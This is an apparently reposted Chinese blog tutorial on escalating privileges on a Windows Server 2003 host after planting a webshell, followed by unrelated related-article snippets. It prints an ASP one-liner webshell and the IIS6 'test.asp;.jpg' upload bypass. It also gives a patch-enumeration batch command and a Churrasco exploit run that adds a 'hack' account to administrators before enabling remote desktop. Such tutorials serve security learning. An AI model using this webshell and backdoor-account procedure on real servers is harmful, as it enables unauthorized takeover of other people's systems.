網絡安全之Windows提權(上篇)(高級進階)

目錄

一,什么是提權?

二,提權的前提

三,如何提權?

1,第一步連接服務器

?2,提升權限至iuser?編輯

3,利用補丁漏洞提權至最高級

四,總結


一,什么是提權?

提權顧名思義就是提升我們的權限能夠讓我們去做更多的事,就好比皇帝跟大臣,很多事情只有皇帝能做,大臣做不了例如擬圣旨,掌管虎符,擁有所有人的生殺大權,我們提權的目的就是當皇帝,皇帝做的我們也能做。

二,提權的前提

提權的前提是我們已經拿到了對方服務器的webshell,可以通過文件上傳,SQL注入,反序列化等等把一句話木馬上傳到對方服務器,然后用蟻劍,哥斯拉,冰蝎,菜刀等等工具成功連接。

三,如何提權?

這里用Windows server2003做演示

工具:菜刀

自動開啟遠程登錄腳本:3389.exe

巴西烤肉漏洞利用腳本:bx.exe

一句話木馬文件test.asp;.jpg內容:

<%eval request("test")%>

這個文件的命名有2個作用第一繞過上傳檢測,第二個是利用了iis6.0的文件解析漏洞,在iis6.0中會把test.asp;.jpg當作.asp文件來執行,而且在iis6.0中還會把*.asp文件夾中的所有文件當作.asp文件來執行。

1,第一步連接服務器

?

連接成功?

?2,提升權限至iuser

因為我們用菜刀連接服務器的cmd權限只是一個來賓用戶沒有iuser權限只能進行一些基本的操作,那么怎么辦呢?我們可以搭建一個跟對方服務器一樣的環境然后把我們具有足夠權限的cmd上傳到對方服務器上運行就可以了。

通過菜刀上傳我們的cmd.exe

使用setp來修改終端路徑,格式setp +cmd.exe的絕對路徑

setp c:\www.test\XYCMS\cmd.exe

?然后發現可以用基本的操作命令了

?但是我們發現我們只是network service它的權限與Users組相同

創建用戶失敗權限不夠,因為iuser權限沒有這個系統級的權限不能夠對它進行系統級的操作

所以我們還得繼續提升權限,通過systeminfo查看對方打了那些補丁。

3,利用補丁漏洞提權至最高級

通過以下命令來查看有那些未打補丁的漏洞可以利用

systeminfo>micropoor.txt&(for %i in ( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type micropoor.txt|@find /i "%i"|| @echo %i you can fuck)&del /f /q /a micropoor.txt

這里解讀一下命令的作用

1,systeminfo>micropoor.txt:將systeminfo的信息重定向(寫入)到micropoor.txt中

2,&:命令連接符,用&連接的多條命令可以一同執行

3,|:管道,可以理解為傳輸數據的通道

4,(for %i in ( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type micropoor.txt|@find /i "%i"|| @echo %i you can fuck)

這里的for是循環的意思依次從( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 )中取一個值給%i,@type從micropoor.txt讀取內容,@find查找%i是否為

micropoor.txt中的內容找到為真,||邏輯運算符左邊為真時右邊不執行,左邊為假時執行右邊,

5,del /f /q /a micropoor.txt:del刪除文件命令,/f 強制執行,/q不詢問用戶,/a文件屬性

6,這個命令的整體意思就是把systeminfo的信息寫入文件然后與我們給定的編號進行查找如果有就不管,如果沒有就輸出它的編號,最后刪除micropoor.txt文件。

?這里我們使用經典的巴西烤肉漏洞

?

?然后利用腳本創建用戶

?

?可以看到創建成功了,說明提權成功。

從下面可以看出新建的用戶是屬于Users組的,在這個組中也只有少量的權限,所以我們把它拉到administrators組中。

?使用命令:

bx.exe "net localgroup administrators hack /add"

?拉入成功

?接下來通過菜刀上傳我們的自動開啟遠程登錄腳本,開啟對方的遠程登錄

?

開啟成功

?去連接對方

?

?

登錄成功,成功拿下對方服務器。

四,總結

說一下我的滲透思路吧,首先通過對方服務器的各種漏洞將我們的一句話木馬上傳至對方的服務器然后通過各種滲透工具連接服務器拿到基本的shell權限,然后將權限提升至基本用戶權限,再通過對方補丁漏洞提升至最高權限。

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/diannao/34938.shtml
繁體地址,請注明出處:http://hk.pswp.cn/diannao/34938.shtml
英文地址,請注明出處:http://en.pswp.cn/diannao/34938.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

大數據集群數據傳輸

簡單的服務器間的通信示例 netcat&#xff0c;簡寫為 nc&#xff0c;是 unix 系統下一個強大的命令行網絡通信工具&#xff0c;用于在兩臺主機之間建立 TCP 或者 UDP 連接&#xff0c;并提供豐富的命令進行數據通信。nc 在網絡參考模型屬于應用層。使用 nc 可以做很多事情&…

docker-compose 之 達夢數據庫(dm8-v202406版)

1、達夢官方沒有提供鏡像直接 pull 的方式&#xff0c;提供的是鏡像的 tar 包&#xff0c;所以需要先去官網下載tar包。 2、然后使用如下 docker load 命令導入鏡像到服務上&#xff1a; docker load -i dm8_20240422_x86_rh6_64_rq_std_8.1.3.100_pack2.tar導入完成后&#…

重磅丨上海容大推出“容聆”智能拾音工牌,賦能線下門店運營數字化

近日&#xff0c;繼豚音營業廳智能質檢終端之后&#xff0c;上海容大數字技術有限公司&#xff08;簡稱“上海容大”&#xff09;在線下面對面溝通場景下語音數據采集與智能分析領域取得了新突破&#xff0c;重磅推出AI智能語音工牌產品——“容聆”。 據悉&#xff0c;“容聆”…

mybatis x插件的使用教程(詳細)

MyBatisX 的主要功能 代碼生成&#xff1a; 自動生成 MyBatis 的 Mapper、XML 配置文件和實體類&#xff0c;大大減少手工編寫代碼的工作量。 智能代碼補全&#xff1a; 提供 SQL 語句和 MyBatis 配置的智能代碼補全功能&#xff0c;使開發者能夠更快地編寫代碼。 代碼導航&…

鈾的危害和應用,以及鈾的分離提純

鈾是一種錒系放射性元素&#xff0c;對人體存在一定的危害&#xff0c;如輻射損傷、呼吸系統損傷、神經系統損傷、免疫系統損傷等。 1、輻射損傷&#xff1a;鈾的放射性會對人體產生輻射損傷&#xff0c;長期接觸會增加患癌癥的風險。此外&#xff0c;還可能對人體正常細胞產生…

【網絡安全的神秘世界】解決dvwa靶場報錯:Illegal mix of collations for operation ‘UNION‘

&#x1f31d;博客主頁&#xff1a;泥菩薩 &#x1f496;專欄&#xff1a;Linux探索之旅 | 網絡安全的神秘世界 | 專接本 | 每天學會一個滲透測試工具 &#x1f6a9;問題描述 當嘗試執行如下 SQL 語句時&#xff1a; 1 union select schema_name,1 from information_schema.s…

如何挑選護眼燈?一分鐘帶你了解挑選護眼燈的六大準則!

小時候&#xff0c;對正確用眼知識一無所知&#xff0c;也不明白何種光線環境對眼睛最為友善&#xff0c;結果如今的近視度數已瀕臨千度大關。雖然早已習慣佩戴眼鏡的生活&#xff0c;但近視所帶來的諸多不便仍舊在日常生活中無處不在。因此&#xff0c;對于家中孩子的視力健康…

第六十七:iview的select組件在頁面上,下拉數據被遮擋

iview的select組件在頁面上&#xff0c;下拉數據被遮擋 加上**:transfer"true"** 代碼截圖&#xff1a; 官方解說截圖&#xff1a;因為默認值是false 所以要改成:transfer“true”

人工智能水平國際領先,科大訊飛再獲國家科學技術進步獎一等獎

科大訊飛在2023年6月24日榮獲國家科學技術進步獎一等獎&#xff0c;這是對其在多語種智能語音技術及產業化領域取得的突破性成果的高度認可。科大訊飛的這一成就&#xff0c;標志著其在人工智能領域的技術實力和創新能力已達到國際領先水平。 據「TMT星球」了解&#xff0c;科大…

WMV 視頻格式怎么轉換?WMV 視頻為什么不流行了?

目前有越來越多的視頻格式類型&#xff0c;如常見的 MP4、FLV、AVI 等等&#xff0c;而技術的演變也逐漸讓一些常見的視頻格式變的越來越少了。 今天我們一起來聊下 WMV 這個視頻格式&#xff0c;讓我們看看它的發展以及為什么現在越來越少人使用了。 什么是 WMV 視頻格式&…

Git 使用指南(附詳細解釋)

Git 是一個強大的版本控制系統&#xff0c;廣泛用于軟件開發中&#xff0c;用于跟蹤文件的更改、協作工作等。無論你是新手還是有經驗的開發者&#xff0c;掌握 Git 都是非常有益的。這篇博客將帶你了解 Git 的基本使用&#xff0c;希望能幫助你快速入門并有效使用 Git。 1. 創…

論文學習_Nebula: Self-Attention for Dynamic Malware Analysis

論文名稱發表時間發表期刊期刊等級研究單位Nebula: Self-Attention for Dynamic Malware Analysis2024年IEEE TIFSCCF A熱那亞大學1. 引言 研究背景與現存問題:動態惡意軟件分析是一項至關重要的任務,不僅對于檢測而且對于了解整個互聯網上廣泛傳播的威脅而言。 收集樣本后,…

【windows|011】TCP/IP5層模型常見協議及應用總結大全

&#x1f341;博主簡介&#xff1a; &#x1f3c5;云計算領域優質創作者 &#x1f3c5;2022年CSDN新星計劃python賽道第一名 &#x1f3c5;2022年CSDN原力計劃優質作者 ? &#x1f3c5;阿里云ACE認證高級工程師 ? &#x1f3c5;阿里云開發者社區專家博主 &#x1f48a;交流社…

記一次面試

Linux查日志&#xff0c;怎么把最后1000行寫到另一個文件中 在Linux中&#xff0c;如果你想要查看日志文件的最后1000行并將其寫入到另一個文件中&#xff0c;你可以使用tail命令。tail命令默認用于輸出文件的最后幾行。 以下是如何使用tail命令將日志文件的最后1000行寫入到另…

java設計模式(二)工廠方法模式(pattern of factory method)

1、模式介紹&#xff1a; 工廠方法模式&#xff08;pattern of factory method&#xff09;是一種創建型設計模式&#xff0c;它定義了一個用于創建對象的接口&#xff0c;但將實際創建對象的工作延遲到子類中&#xff0c;這樣可以在不改變整體結構的情況下&#xff0c;通過子…

課時166:腳本發布_腳本技巧_技巧解讀

2.3.1 技巧解讀 學習目標 這一節&#xff0c;我們從 簡單腳本、復雜腳本、注意事項、小結 四個方面來學習 簡單腳本 簡介 1、手工執行的命令一定要可執行2、命令簡單羅列3、固定的內容變量化4、功能函數化復雜腳本 實踐 1、手工執行的命令一定要可執行2、根據發布流程編寫…

第二節課 6月13日 ssh密鑰登陸方式

centos和ubuntu openssh服務的初始安裝 一、實驗&#xff1a;ubuntu系統激活root用戶 ubuntu系統如何激活root用戶&#xff0c;允許root用戶ssh登陸&#xff1f; 1、ubuntu默認root用戶未設置密碼&#xff0c;未激活 激活root用戶&#xff0c;設置root密碼 sudo passwd roo…

vray燈光導致3dmax崩潰怎么解決?

啟動時崩潰 解決方法&#xff1a; 1、兼容模式重新打開 具體步驟&#xff1a;【選中會閃退3dmax版本】——【右鍵“兼容性疑難解答”】——【下一步】——【選擇Windows7/10】——【下一步】——【啟動程序】 啟動完成后&#xff0c;【下一步】——【為我保存這些設置】—完…

CI構建pipelines

目錄 構建代碼風格代碼覆蓋率靜態檢測 CI構建可以分為幾個部分&#xff1a;構建代碼&#xff08;可以是多個平臺&#xff09;——>UT用例 ——> 代碼覆蓋率 ——> 代碼靜態檢測 首先保證有可以CMakeLists.txt可以在本地正常編譯業務代碼和UT代碼 構建 首先需要有ci構…

強化學習專題:強化學習知識梳理(一)

2024/6/23&#xff1a; 前段時間有幸完成了大學期間的第一篇論文。在面試之前復盤一下關于自己論文中DQN的一些相關點。 淺談主要區別&#xff08;在線 or 離線&#xff09; 首先&#xff0c;一切的開始是強化學習中時序差分方程&#xff0c;這體現了強化學習方法的優化策略。在…